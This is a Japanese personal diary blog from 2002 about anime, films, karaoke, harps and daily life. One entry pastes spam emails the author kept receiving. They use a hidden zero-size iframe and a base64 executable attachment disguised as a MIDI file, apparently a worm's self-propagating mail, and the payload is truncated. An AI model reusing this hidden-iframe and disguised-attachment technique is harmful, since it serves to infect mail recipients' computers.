日常妄想
外界へ戻る下層へ転移上層へ転移

2002年08月28日(水) 『スンスンスン♪』のこと。

(・∀・)スンスンス-ン♪ ( ゚д゚)ハッ!
ってコレ、ものすごくウケたんですが、どう聴いても「( ゚д゚)ハッ!」じゃないよねぇ(笑)
( ゚д゚)ハッ! は、むしろ "月迷風影" だろう(笑) 曲を聴くたびに、あのキアイっぷり(どんな "ぷり" だよ)が気になってしょうがないわたしがいます ( ̄▽ ̄)

で、タイトルの話題は以上なんですが(笑)
今日は、定時という感じでわりと早めに帰宅をしたのですが、そういえば親が弟夫婦のところに遊びに行ってるのだったと思い立ち、いそいそとビデオを用意して、アニメ版『十二国記』の11〜13章をリピートしてしまいました♥

そういえば、勝生真沙子さんでしたね、文字。どうも違和感があると思っていたんですが、だいぶ後になってから思い出しました。『生』ですな。サービスだったのか、朱衞が語る尚隆と六太の過去のシーンで驪媚が出てきて(海神はやらないのでしょう。主要シーンをここで出ちゃってるし)、六太に、どうかいい王を選んでと平伏して懇願するのね。これだけのシーンにしか出てこない役を(『東の海神 西の滄海』では重要なキャラですが)ベテランの勝生さんが演じておられ、ほかにも、水禺刀の映す過去のシーンにて予王を藤田淑子さんが、現時代では舒栄を小山芙美さん(また文字間違えてるかも)が演じている。なんとも贅沢に感じました♪ お三方とも、好きな声優さんなので余計です (⌒ω⌒)

今回観て思ったこと。
○陽子はいつからあの口調になったのだろう?
○六太、過去のシーン。女仙の女の子たちや驪媚が、六太を延台輔と呼ばずに延麒と呼んでいるが、これは延麒でいいのかしらん。
○塙王まで杉本ちゃんを「杉本」と呼んでいるのがなんかウケた(笑)
○尚隆と陽子が鞍を並べて出陣するシーン。尚隆は芻虞("すう"が出ない)、陽子は吉量に乗っているが、矢を射るシーンの前、景麒を目指せと陽子に行って敵軍に突っ込んでゆく尚隆、吉量に乗ってない?? <あれは陽子だったのかしらん。
○女怪が総じてカワイイ(美人)。汕子も期待大。
○杉本ちゃんの活躍しない原作は寂しい(;´д`) 陽子の孤独な戦いが孤独さを増してしまい、読み返したらつらそうかも(汗)

それにしても、いきなり異世界に飛ばされ、あなたはこの国の王なんですと言われるのもすごいが、自分の友達が実は異世界の人間、しかも王だった、なんて展開は考えてみるとすごいことだ。ファンタジイものにはありがち、とも言える設定だが、現実に被せてみるとすごいよね。泰麒もそう。かれの場合、麒麟だったというのだから更にすごい。わたしが杉本ちゃんや広瀬だったら、どういう目で陽子や泰麒を見たろうか。現実にはあり得ないことだけに、いろいろ考えちゃいます。

+では最後に。今日の午後、ハープ教室の問い合わせメールを2カ所に出しました。早く返事がくるといいなー。通うのはたぶん、銀座のほうになると思うけど、もう一方はなんと、アイリッシュハープの第一人者、坂上さんに教えていただく教室なのです(もちろんマンツーマン)。池袋なので、仕事帰りでも通えないこともないんだけど、受講料のこととか、いろいろ吟味したうえで、いつからどこで習うのか決めようと思います。坂上さんは、教室で教えるのに、ストーニー・エンドのイブをお使いのようで、そのへんもいいのよな…… わたしがほしいのも同社のハープなので。ブリタニー(ブリトニー?)だけど(⌒ー⌒) 銀座のほう、十字屋さんではたぶん、使用は青山ハープでしょう。 <イヤなわけではないです。

ああ〜。メールごめんなさい。>某姉妹さま
今日はもう寝ます……


(0829 01:05 UP)


2002年08月26日(月) 『月迷風影』のこと。

先日の日記で。寺本(寺西)って誰。
どっから出てきたんだろ。浅野くんだよ……(泣笑)

+前回の日記、"看板に偽りあり" になってしまいました ( ̄▽ ̄)  あのあと、家で続きを書くつもりでいたのだけれど、疲れていたかなにかで、結局書けずじまい。"いろいろ" とかいいつつ、竪琴師ラブ♥としか書いていません(笑) 当初の予定では、いろいろ語るつもりでいたんです。

+さてさて。ようやくアニメ版『十二国記』の残り、9〜13章を観ました。転章でしたか、楽俊と陽子のエピソードは借りていたビデオテープの関係で未見です。でも、そんなゼイタク言ってられません! 本編を観ることができただけでも感激だ。いまは懐かしい『小さなバイキング・ビッケ』に出てくるキャラを思い出したほど感激だ。「か〜んげきぃー♪」と言って、飛び上がって足をポンと打つアレだ。詩人のヒトだったっけ?

詩人ついでに関係ないけど、十二国記とおなじ枠内で放映していたビストロレシピの後番組が、『ガンバの冒険』ですって!? Σ( ̄△ ̄;) ガンバは、原作本を読んだりビデオに撮ったりもしたほどに大好きな作品だった。懐かし過ぎる…… で、シジンという名前の、ノッポさん(これも古いし)みたいな帽子を被ったネズミが居て、ときどき詩を読むのだが、最終回のモノローグがとても印象的でした。小さい頃からこういう、言葉や音楽ものにハマることが多くて、劇中の歌も好きでした。踊り踊らば〜あの娘と踊れ♪ <潮路さん、名前が好きだった。原作では(ピー)。

+あああイカンイカン。十二国記でした。アニメ版をひととおり観ることができて、いちばん強く思ったことは、『原作をないがしろにせず、とても丁寧に作っていた』ということ。特に、『月の影 影の海』のラストにあたる13章は、本当にいいできで、嬉しくなった。慶国の新しい王として、厳しい現実に立ち向かい、自覚を育てつつも、傷つき、疲弊している陽子。そんな彼女を抱き締めてやる杉本ちゃん。杉本ちゃんは、最後にきてようやく、いままで憎んでさえいた陽子のことや、自分についてを見つめ、認め、理解することができた。すべてを受け入れて自分のあるべきところに帰ってゆくシーンと台詞が印象的でした。

ってゆーか、杉本ちゃん。浅野くんと付合ってたのでわないのか!?(笑) っつーか、結局浅野くんは河に落ちてそのまんまなのね…… ( ̄▽ ̄)  名前も忘れてたしね!!!!(泣笑)
不憫だわ……次に出てくるんだろうか。杉本ちゃんのかわりに活躍するのか?

蓬莱に戻った杉本ちゃんが、高里くんに会っているシーンに驚き。よく考えられてるなぁ、と思った次第。しかも高里くん、脳裏にある、遠い十二国の絵を描いている。『魔性の子』では、ギアナ高地みたいな景色の絵を描いているというような描写があったけど、十二国の絵は無かったような?? うを〜繋がってるぜぇぇ!! と感激でした♥ 高里くん、なかなか可愛かったが、髪型が変でした ( ̄ω ̄;) 原作(『黄昏の岸 暁の天』のほう)に出てきた様子よりも、少々幼い印象。一人称「ぼく」な感じ。声のひとが、蒼猿を演じてらしたひとでした。名前見ないとわからんかった!

声といえば、延麒の幼少時代を杉本ちゃんがあてており、壁先生をなんと田中秀幸さんが演じてらした!! 得した気分が♥ 前日、何気なくテレビをつけるとスラムダンクの映画を放映しており、田中さんがナレーションをしてらしたのを聴くことができたので、喜び二乗♪ ちょっとの役をベテランの声優さんがあてていらしてびっくりでした。勝木真沙子さんにひさびさに出会えて、なおビックリ。あと、これは勘違いでしたが、初め、朱衞も田中さんかと思っていました……

ともあれ、いい作品になってよかった。13章などは、もういちど観たいと思うし。予王がイメージと違ったが(景麒に恋着していたという点を、もうちっと明確に出してほしかった)、とくに文句を言いたくなるようなところは無かった。少々のことならオッケーよ♪ という感じで、終始あたたかい目で観ることのできる作品でした。
特に気に入っているのはやはり、麒麟の描かれかた。可愛いし、美しい(⌒Ο⌒) 獣型の延麒が駆け降りてきて転変するシーンは爽快感もあって良。山田さんも延麒がお好きな感じがするけど、アニメのスタッフにも愛されてる感じがしました(笑) とりあえず、ほかの麒麟さんたちには、もうちっと慎み深くしていただかないと、目のやり場に困りますな(照)

ますます『月迷風影』を歌いたくなってます。でも、どこのカラオケにも入って無いでしょう(苦笑) リクエストで入ったりしないのかな。(あと、関係ないが坂本美雨が入らない……うう。)

では、そんなところでおしまいに。
今日は根を詰めて仕事をしたので疲労困憊。もう寝まーす(⌒ー⌒)


(0827 00:58 UP)


2002年08月22日(木) 『物思ってることいろいろ。』のこと。

マズった。カッコとURLだけで書き込んじゃったよハハ〜ン(泣笑)

+昨夜、久しぶりに、憧れのアイリッシュハープを売っているサイト、手作り楽器工房ミネハラさんに行って、そこからメーカーのホームページに飛んだら、もっとツボなハープを見つけてしまった!! わたしの欲しい形のハープ(形から入る奴・笑 でも、音もすごく好きなのだ)は、22弦なのだけど、まったくおなじ形の26弦ハープが売っているッ♪ このフォームがいいんだよねぇ……なんともいえずケルティックなのだな。<って、なんかバカっぽいコメントですが(笑)

わたしのほしいのはBrittany。そして、更なるドリームを掻き立ててくれるのは、Anne! まぁっっ、マキャフリイとおんなじだわ♥♥♥(笑) 音も聴けるので、ちょっとでもご興味のあるかたは、下記リンクからサイトを覗いてみてください(*^o^*)
→→→ハープの紹介ページ
→→→Stoney EndのサイトTOPページ

と、一旦ここで更新しておきます。タイトル無しで本文がURLだけってのはアヤシ過ぎる…… しかも例によって勤務時間中なので、時間をみながら後を更新します。



2002年08月17日(土) 『いらんことばっかり考えてました。』のこと。

+スターウォーズ新作、観てきました。雑誌でユアン・マクレガー(オビ=ワン)が、エピソード1はつまらなかったが、今回の話はいい! というようなことを言っていたのもあり、恋愛がストーリイの軸にあるというのを鑑みつつも(あえて『恋愛もの』を観ようという気は無いからだ)、面白そうかなー! と期待をしていたのだったが、わたし的には「へっ? それで終わりなの?」という展開で、あまり満足がいきませんでした。ストーリイやキャラにも入れなかったし。映像は、アクションを含め、確かにすごいが、それだけ、という感じがしてしまった……
話に入りこめず、途中寝そうになりさえしていたわたくしは、いらん妄想ばかりをしてました( ̄▽ ̄)

○やはり剣戟はいい!! 剣士はカッコエエのう。
○ジオノーシスの砂色の空が、バロックのオープニングの色のようだった。
○転がってくる敵にカトーさんを連想。
○クリストファー・リー。やっぱりいい声。
○クリストファー・リー。それわスクーターですか。
○オビ=ワンおよびヨーダVS、クリストファー・リー扮するドゥークー卿のシーン。回らないかな!!(笑) <指輪ネタ。

なんだか本編に関係の無い余計なことばかりです。アナキンとパドメが意思の疎通をし、無事ラブラブになったのはさすがにわかったけれど、ラストシーンで○○○○(紛らわしい伏せ字・笑)していたなんて、パンフを読むまで気づかなかったしなぁ…… 画面の派手さに気を取られてしまい、話の内容や、キャラクタアの心理などの深い部分をあまり感じられなかった、考える気持ちにまでなれなかった、という感じでございました。

ナブーやタトゥイーンにではなく、わたしの心はミドルアースに在る…… スターウォーズは旧作から好きだったけど、新作はハマるというほど好きになれないなぁ。ネット上という公の場であんまり言うのもはばかられるので書きませんが、いろいろ心配してしまいました(´ー`;)

+その後、新宿には出ずに、有楽町でお昼、銀座でカラオケ。カラオケは、歌広場ではなく、歌広場の近くに見つけた、曲数の多い安いところに初めて行ってみた。店が暗い!! 暗過ぎる!!(笑) 半端な時間だからか、だだっ広いところなのにお客も殆ど無く、「なんかヤバいんじゃない(汗)」的な雰囲気のあるところだったけど、そのうちお客さんも増えてきて安心(笑) 

1時間半という短い時間でしたが、わたしはそのなかで、"夕立ち"(スガシカオ)、"唐人物語 ─ラシャメンのうた─"(サザンオールスターズ)、"Mysterious Eyes"(GARNET CROW)、"野生のチューリップ"(遊佐未森)、"夏を見渡す部屋"(Zabadak。ひさびさ……)、"雲路の果て"(Cocco)、自分的バロックの主要キャライメージソング"Endless sorrow"(浜崎あゆみ)、"ワダツミの木"(元ちとせ)を歌いました♪(抜けてるのもあるかも。順番も怪しい) なお、ワダツミは元歌の聴き込みがまだまだ必要、GARNET CROWは英語部分の練習が必要でございます。以前と違ってたまにしか歌っていないので、上達ができずに哀しひ。

Endless sorrowは、プロモで歌うのが二回目だったのですが、やはりプロモもエエ感じにバロックでよかったです ( ̄▽ ̄) セピア色の映像が、ますます雰囲気をよくかもしだしてくれます(笑) 配信会社がカラオケのために作ったやつじゃない、 本人出演(街頭のポスターで、ですが)の、本物のプロモです。
言葉の禁じられた歪んだ世界。羽根。その世界に対して反発を試みる金髪の少年。塔。片翼の少年。そびえる塔によじ登って行く。コードに繋がれた少年。牧師。塔の上にもうひとりの少年。降りしきる羽根。塔を見上げ、感涙を流すひとびと。
LDで歌うと、コーラスがバッチリ入ってくれるので、映像だけじゃなく歌うのも、すんごく楽しいです♪

+カラオケのあと、HMVでアルバムを2枚ゲット(ヴァンゲリス、ロリーナ・マッケニット)、その足で『VAMPIRE CAFE』に行ってお食事。面白いね。『Christon Cafe』に先日初めて行ったんだけど、まるで対になるようなお店だ(笑) バンパイア・カフェも友達の紹介で今日が初めて。面白いんで、お互い紹介しあおう!! ということで、今度出掛けたときには、わたしがクリスチャン(と読んでいいのかな)・カフェを友達に紹介します(⌒Ο⌒)

ちなみに、クリスチャン・カフェは、内装が教会のようになっており、祭壇やシャンデリアがあって、大きな教会のようにかなり広いホールのなかに、テーブルと椅子がたくさん並べられていて、わりとざわざわ賑やかなお店。バンパイア・カフェは、どことなく穴ぐらや墓場な感じ。狭いめで、ホールという感じではなく、薄いカーテンでテーブルが区切られ、誰かの家に呼ばれてきた、という雰囲気もある(もうひとつ別に広い部屋が在るが、そこにはまだ入っていない)。
心地よい賑やかさ、お値段の手ごろさ、ゴスロリの好きなひとには前者を、密談(笑)、まったりとくつろげる空間、少々高価なお酒を好まれるひとには後者をオススメいたします♥ なお、どちらも店内薄暗く、蝋燭の灯が綺麗で雰囲気が素敵です。お料理も美味しいのでオススメ。

◇ご参考にドウゾ。お店のサイトです。
Christon Cafe http://www.ug-gu.co.jp
VAMPIRE CAFE http://www.diamond-dining.com



+そうそう。いらんことばかり考えて……といえば、ライパク最終巻。アーサーが実は双児(兄が居た)で、リングトゥエルブ(12本の特別なゴルフクラブ)が実は13本あった、という事実が判明し。双児!? 13!? バロック!? Σ( ̄△ ̄;) <ソレしか無いんですか。
ライパク……あ〜。う〜。ふー。しくしくしくしく…………

をはし。
あしたは日曜でもともと休みだけれど、最後の夏休みでもあります。
なんかだらだら過ごして終わっちゃう感じが嫌だ(泣笑)


(0818 00:56 UP)


2002年08月16日(金) 『観たり読んだり』のこと。

+ええと、明日は友達と出かけるんですが、待ち合わせの時間が未だ決まっておらず、メールの返事待ちをしていて、お風呂にも入れないし、ましてや寝ることもできないという状態なので、その時間を利用して、本日していたことなどを書いてみようと思います(笑) や。まぁ、どのみち書こうとは思ってたんだけどね(⌒ー⌒)

+今日はようやく、N嬢に貸してもらったアニメ『十二国記』のビデオを7章まで観ました。BS2での放送のため、衛星の入っていない我が家では観ることができないので、ビデオに撮っているというN美ちゃんにお願いした次第であります。やー。あとから気がついたのだけど、CMが入らないっていいねー!!(驚)

なんとなく勘違いしてました。テーマ曲の"月迷風影"って、エンディングに流れるのね。オープニングかと思ってた……で、勝手に映像を考えてみたりしてな。ここでこんな感じに陽子が歩いてたりしてー、とか(笑) わりと、こういう演出とかって考えるの好きなのだった。自分のオリジナルをアニメ化するようなことがあったら、オープニングには、鈴木祥子の"風の扉"がいい!! とかいって、その曲の背景に流れる映像を妄想してみたりして ( ̄▽ ̄) <ここで誰々が振り向く! とか、空を見上げてるとかね(笑)

で。内容ですが、アニメオリジナルのキャラが出てくるのを事前に知っていたので、どうなっちゃうのかなーと、かなり心配だったのが本音なのでしたが、なかなかどうして、面白いです。よく考えられてる。陽子はあちらの世界の言葉を聞き取り、話せるが、海客は通常、まったくの異国の言葉として理解することができないというのも、杉本ちゃん(読み:すぎもっちゃん、でひとつ・笑)の台詞とかでわかりやすくなってたり。陽子の外見が変わってしまっている、というのも。

てゆーか、杉本ちゃん、かなり面白いキャラでイイです。こういうの絶対居る居る、とか思いました(笑) もー、オイシ過ぎです。1章目が始まる前の解説で、ナビゲーターのお姉さんが、○曜日を担当していた○お姉さんがキャラクタアの声で登場します。探してみてね♥ 的なことを言っていたのでしたが、杉本ちゃんの声をあててらっしゃるんですね。なんか、声優さんみたい、というか、演技がお上手で、とても一介のアナウンサー(失礼)とは思えないほど……なんだか感心しました。いいなぁ。アフレコ楽しそう。

麒麟が神獣然としていて、美しくてよいです。鼻が可愛かった(⌒ω⌒) 千と千尋の、龍型のハクの鼻みたい。塙麟、原作よりもかなり見せ場増。美人。失道した姿も描かれており、痛々しい。で、景麒ですが。コワイ!! コワ過ぎだ!!(笑) あれじゃ陽子でなくてもビビる!! ( ̄▽ ̄;) わたしのなかでは、もうちょっとやわらかさのある無感情が声音のイメージだったので(アレ〜ンbyエスカな声とか……って、三木さんね・笑)、余計に怖かったです。子安さんは朱衞(字が出ない?)がいいなー。CDドラマのイメージが先にあったりもして。尚隆も……でも、尚隆、今回のひともいい感じかも。延麒はCDのままで嬉しい♪

あとは……そうだな。楽俊の口がモフモフしていたとか(しゃべりがなんが、いがっだなぃ)。陽子がアバンストラッシュを決めていたとか(笑)、キレっぷりがよかったとか。 陽子のサバイバルは、原作のほうがはるかにシビアだった。アニメでは、視聴者に与えるダメージとか(笑)、時間の関係とかもあったりするんだろうけど、ちょっと健康的過ぎるかなー。まぁ、でも、アニメの見せかたとしては上手かったと思います。慶の現状をお芝居でさりげに示唆しているのもいい。

やー。とりあえず、7章までの一番の見どころは、わたしのなかでは、なんか杉本ちゃんでした ( ̄▽ ̄)  寺西くん? 寺本くん? 河に落ちたあと、かれはどーなってしまったんだ(汗)<名前も思い出せません。
次週……でわなく、次回観る話は、雁国に着いて、遠山の金さんを地で行ってる延王に邂逅するところなので、またいろいろ面白そうです。ありがとうN美ちゃん!! アニメ観られて嬉しいよ。感激っス♥ しかも、まとめて観られるのってすばらしい。

+読んだり、というのは、『ライジングインパクト』の最終巻。ショックだ……あれで終わっでしまうんだなぃ。わたくし、トリスタンが見たくてあえて今日本屋に買いに行ったのに(買い物がてらとかいって、わざわざ新宿まで。明日も行くっちゅーの!!・笑)、出番はアレだけなのね(泣笑) や。トリスタンは登場時から好きなんですが、自分的にちょっと盛り上がってるので。ヴァンゲリスの"HYMN(讃歌)"が、トリスタンのイメージというか、テーマ曲っぽい感じがするんだよね…… コースにひとり佇んで風に吹かれたりなんかしているイメージにすごく合うと思うんだな。 <やっぱりゴルフ場なんですか(笑)

最終巻を読んで思ったのが、央氏は健康的なひと、純粋なひとなんだなぁ、ということ。登場キャラクタアがみんなしあわせな未来を歩んでいる。好きな誰かと結ばれて、家族を作って。仲間がいて、見守る誰かがいて。その後の姿をくわしく描かれていないキャラもいるが、とにかく、笑顔があって、しあわせそうなのだ。
あー。よさげな新しいキャラも結構いたのに、勿体ない。アーサー兄とか、アルロワさんとか美形だしなぁ。<美形好き。しかし、おやぢ(ヒゲ付)も好きなので、アーサーも結構好きだったりする。 ほかにも、いいキャラがいっぱいいたのになぁ。央氏はキャラクタアを立ち上げるのが上手いひとなのです。

あー。もう1冊ぐらい続けてほしかった。書き下ろしで単行本出すのは駄目だったのかな。画風とか、ストーリイとか、そういうのだけじゃなく、キャラクタアの描かれかたが、とても好きな作品でした。ばっちょさん、お疲れさまです(⌒Ο⌒)

と、ゆーところで、締めましょう。遅くなった……明日早いのに(笑)とりあえず明日の件は、この日記を書いているあいだに、友達と連絡が付きました。わたしのほうにメールが届くのが遅れていたようです。普段の日よりも起きる時間が早いです。ピンチだ!! わたしが起きられなくても、親は仕事なので起こしてもらえるので寝坊は無いんですが。
明日は、スターウォーズ観たり歌ったりしてきます。


(020817 01:46 UP)


2002年08月14日(水) 『PHSに謎なメールが。』のこと。

+今週月曜から、わたしのピッチに、意味不明のメールが入るようになった。HTMLメールをPHSに送るなっちゅーの ( ̄ー ̄) なにかの間違いだと思っていたら、以来、毎日届くようになってしまった。たいがい昼過ぎに送られてくるのだが、今日みたく、時間を置いて2度以上送られてくることもある。鬱陶しくてしょうがない。しかも、ピッチに入ってくるメールがこれオンリー、というのがまた苛立ちを増長させるのだ。

どこから流出したんだよ、という感じ。PHSのメルアドなど、わたしは友人とサークル仲間にしか教えていないし、ましてや、対パソコン用になどは決して使わぬ。PHSのメルアドは、携帯を使っている友人宛に、職場などの外出先からメールを送るときぐらいしか使わない。それはなぜか。パソのキーボードで文字を打つほうが何倍も早く済むからだ。

で、その送られてくる内容というのは、以下のとおりだ。

----------------------------------------

From:(毎回違う差出人アド)
Date: Wed, 14 Aug 2002 01:20:16 +0900 (JST)
Subject: Fw:sos!
To:(わたしのPHS用メルアドになっている)

--IrjAi46JLQ8801Vr2Fpe
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:W4aSIj4z4 height=3D0 width=3D0>
</iframe>
<FONT></FONT></BODY></HTML>

--IrjAi46JLQ8801Vr2Fpe
Content-Type: audio/x-midi;
name=class.bat
Content-Transfer-Encoding: base64
Content-ID:

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
RE9TIG1vZGUuDQ0KJAAAAAAAAAAYmX3gXPgTs1z4E7Nc+BOzJ+Qfs1j4E7Pf5B2zT/gTs7Tn
(ウザイので以下略。)


----------------------------------------

From: (毎回違う差出人アド)
Date: Wed, 14 Aug 2002 23:08:26 +0900 (JST)
Subject: Fw:Starting
To: (わたしのPHS用メルアドになっている)

--D1AoTi0L28788HIqd
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:ZC09W8KdDy height=3D0 width=3D0>
</iframe>
<FONT></FONT></BODY></HTML>

--D1AoTi0L28788HIqd
Content-Type: audio/x-midi;
name=USB .exe
Content-Transfer-Encoding: base64
Content-ID:

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
RE9TIG1vZGUuDQ0KJAAAAAAAAAAYmX3gXPgTs1z4E7Nc+BOzJ+Qfs1j4E7Pf5B2zT/gTs7Tn
(ウザイので以下略。)


----------------------------------------

From: postmaster@****
Date: Wed, 14 Aug 2002 23:09:51 +0900 (JST)
Subject: Fw:Undeliverable mail--"Desktop "
To: (わたしのPHS用メルアドになっている)

--MI4b9c2WV475965U2p3
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>

<FONT>The following mail can't be sent to ****@d7.dion.ne.jp:<br>
<br>
From: (わたしのPHS用メルアド)
<br>
To: ****@d7.dion.ne.jp<br>
Subject: Desktop <br>
The attachment is the original mail</FONT></BODY></HTML>

--MI4b9c2WV475965U2p3
Content-Type: application/octet-stream;
name=藪bat
Content-Transfer-Encoding: base64
Content-ID:

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
RE9TIG1vZGUuDQ0KJAAAAAAAAAAYmX3gXPgTs1z4E7Nc+BOzJ+Qfs1j4E7Pf5B2zT/gTs7Tn
(ウザイので以下略。)


----------------------------------------

なお、Subjectが『Fw:』となっているのは、PHSに届いたものをパソコンに転送しているため。ちなみに、差出人は、入間にあるケーブルテレビのユーザ、ディオンのユーザなどなど、そのつど異なっているが(いちばん初めにきたのは入間)、多少のバリエがあるものの、よくみると内容がおなじである。インラインフレームで、何かを見せようとしているらしい。
ちなみに、上記の『****@d7.dion.ne.jp』さんを、わたしは知りませんし、このかたにメールを送った覚えもありません。

てゆーかね……HTMLメールで、インラインフレーム? メーラーでiframe見れんデスカ?? ( ̄ー ̄;) ウィルス感染? 新手のイヤガラセなのだろーか。メーラーを開かなくさせる、とか?
たぶん、意味不明の文字の羅列部分やなんかは、PHSに送られてきたせいで文字化けを起こしてしまっているのだろう。WinからMac、MacからWinにメールを送っても、たまに文字化けすることがあるようですが。

とりあえず、わたしのPHSのメルアド(電話番号@云々じゃないほう)をパソコンのメーラーのアドレス張に控えてくれているひとのなかに、ウィルス感染をしている恐れのあるひとが居るんではなかろうかと踏んでいるのだが、心当たりのあるひとは、ちっと調べてみてほしいんですが……日記で言うのもアレだけど(苦笑)

とにかく、わたしは心当たりが無いのデスよ(泣笑) HTML形式のメールをやりとりするのなんか、パソのメールぐらいだろうし。毎回、差出人が違うのに、送られてくる詳細がおなじ、というのもヒジョーに怪しいと思うのです。友人・知人が間違えて送ってきているのだとしたら、当然、わたしは差出人がわかるだろうし、毎回差出人アドが違うわけが無い。
ちなみに、わたしはウィルス騒動には比較的縁の無いマックユーザなうえ、自分のPHSのアドレスを、愛用のメーラー・ユードラに保存してはいません。
また明日も入ってくるんだろうと思うと鬱だ(;´д`)<しかも容量が重いんだよねー。

も・もしかして、PHSにもウィルスがあったり!? って、聞いたことねーし(汗) それに、わたしのアドレスの出元が知れぬ。わたしの使っている二ックネームは、まずまず、他人が連想できるものではないしね。謎だ……
っつーか、なぜにHTML形式のメールがピッチにくんですか!? <振り出しに戻る(笑)


(020815 00:41 UP)


2002年08月13日(火) 『今日から夏休み中』のこと。

+わたしは、今日から夏休み。次に出勤するのは来週月曜で、土日を含めると、約1週間の休暇ということになる。転職前の職場では考えられない。2日休むにもイヤな顔されたからねー。それに、休んでも、会社出てけば仕事がまるまる溜まってるんで、あとが大変なのね。ほかにわたしの仕事ができる人間が居なかったから、自分でやるしか無くて、お休みのありがたみも吹き飛ぶっちゅーの。ほんと、すべての面において、仕事に関して現在のわたしはしあわせである。

会社自体は、実は通常どおりに動いている。お盆休みでお休みになっているのは、社長のK島さんとわたくしだけで、ほかのメンバーはいつもどおりに出勤している。というのも、ほかの3人は、既に海外に行って帰ってきていたり、9月に休暇を取っていたりしているからだ。いつも働き詰めのK島さんと、取り立てて予定の無いわたしは、休めるときに、ということで、世間に合わせ、お盆休みとして、休暇を取ることになった。K島さん、ちゃんと休んでますか? K島さんのところには、ひんぱんにメールや電話が入るので、なんだかんだ休暇中も大変そうだ。

仕事と言えば、わたしの関わった携帯の某アプリケーションが、本日から正式オープンとなっていたはず。無事にスタートできてるのかなぁ。関わったとはいっても、プログラムを組んでるわけでなく、わたしがしたことといえば、リンクの張り替えや、フローを元にした本文の簡単な打ち直し、携帯でちゃんと操作しているかどうかのデバック、ぐらいなのだけど、超有名キャラクタアのアプリなので、ユーザがそれだけ多いと思われる。ドキドキだ…… <嬉しさ込みでね(⌒ー⌒)

+ふー。眠くなってきた。今日はひさびさに『眠いけど、眠ったらいけないような気がする病』が出たので(笑)、あくびをしながらこれを書きはじめたのだ。黎明です。空が薄い青紫色。今朝は雲が多い。
お休みの1日目だった今日は、なにもせずだらだら過ごした。お休みの醍醐味!?(笑) やることはあっても、急に時間が取れると、かえってなんにもできないのがお約束。そう言っているあいだに、空がサーモンピンクがかってきました。

自分が休みでも、周囲の人間も空いているとは限らないので、そのへんが上手く行かぬ。するべきことをうっちゃって、なんにも予定が無いとか言っているわたくしは、ひとり遊びをしているしかない。長期の休みは、嬉しいけれども、生活の基盤になるような予定が無いと、生活パターンが崩れてしまうし、寂しさの際立ってしまうところが嫌だな。
生活パターンについては、寝るのが今みたいに朝になったりするし、休日は遅くまで寝ているのもあってか、3食キッチリ食べなくなるし、必要に迫られないかぎり外出をしなくなる。<面倒くさくなったりね…… 実は、わたしは自分を律してくれるようなものが無いと駄目な人間なのである。<近年知った。 よくない……よくないよママン(泣笑) 嫌だな……

もう寝ませう。朝日も昇ってきたようです。向いのマンションに映りはじめた朝日が、朱色で素晴らしい色だ。外に出て写真を取りたいとこだが、寝巻きなのでやめときます ( ̄▽ ̄;)

なんとなく、つらつらと書きたかったのでした。
あー。せっかく翌日がお休みなので、ラーゼフォン見ようとしてたのに、コロっと忘れておりました。夜の2時からってどうなの??(泣笑) 音楽からハマリそうな作品なんだよなー。どうだろう。もう今月中に完結しちゃうんだけど。見る前に終わっちゃう(苦笑) まぁ、機会があればレンタルでもしてみましょう……

では、寝ます。


(020814 05:09 UP)


2002年08月06日(火) 『全英オープン〜!!』のこと。

CDを聴いた際のわたしの第一声。

うわ!!!! Σ(゜△゜)
全英オープン!! 全英オープンだよ!!!!


ゴルフに興味の無い人は、なんのことだかきっとわからないと……(苦笑)
『全英オープン』とは、毎年行われているゴルフの世界的トーナメントのことです。今回は、覇者と言われていたウッズが不調、日本の丸山選手がかなりの活躍をみせた大会でした。
(日本の選手が首位争いに食い込むことは、これまで無かったらしい。)

このあいだの日記にも書きましたが、その全英オープンのテレビ放映で数年前から使われているテーマ曲がもうずっと気になっていて、CDで聴きたくて仕方なかったのだが探す手立ても無く、毎回放映のたびに「ああ〜。この曲好きなんだよ〜……」と、切ない思いをしていたのでしたが、全英オープンの公式サイトを覗いてみたら、なんと曲が紹介されていて(去年とかは絶対に無かったよ〜。見に行ったもん……)、遂に念願叶って、その曲をじっくりと聴くことができました、という話です♪

放送局に問い合わせの手紙を出したり、パソコンを自分で持つ前には、友達に質問メールを出してもらったりもしてました。電話なら答えてもらえることがあったかもね(⌒ー⌒;)

ちなみに、ゴルフに関しては、曲が気になっていたので全英オープン自体にも思い入れがあるのですが、自分がプレイする機会も無く、ファンの選手が居たわけでもなく、基本的には、ジャンプで連載されていた漫画『ライジングインパクト』が好きだったので、その漫画で接したことぐらい、ライパクにハマって以来、たまに少し週末にテレビ放送をちょびっと見てみるぐらいです。

で、曲名と作者の判明した先日、CDを早速Getしてきたのでしたが、そのアルバムに入っていた曲は、リミックスされた新しいアレンジのもので、厳密には全英オープンとは違うものだったのでした。<それでもかなり感動。合唱の入ったこのバージョンもよいデス!!
そして本日、とうとう聴きたかったアレンジのものをGet、耳にすることができたのでした ( ̄▽ ̄)  それで「全英オープンだー!!!!」(笑)

やっぱ、いいです……うう〜。感動した!! 否、冗談抜きでね(笑) ほんとうにいい曲。3分も無い短い曲でしたが、何年も諦められなかっただけあるわ♥ と思いましたですよ。あ〜。しかしなんだな、この曲を聴くと、蒼蒼とした芝が思われるよ(笑)
やわらかいタッチで、澄んだ陽射しのような、波に漂うような、遥かな平原のような(ゴルフ場?・笑)イメージなのに、魂の内側から、なにかあたたかく貴いものがこんこんと湧き出てくるような、なんとも言えない、心地のよい力強さを感じる曲なのです。個人的な感想に過ぎないかもですが。
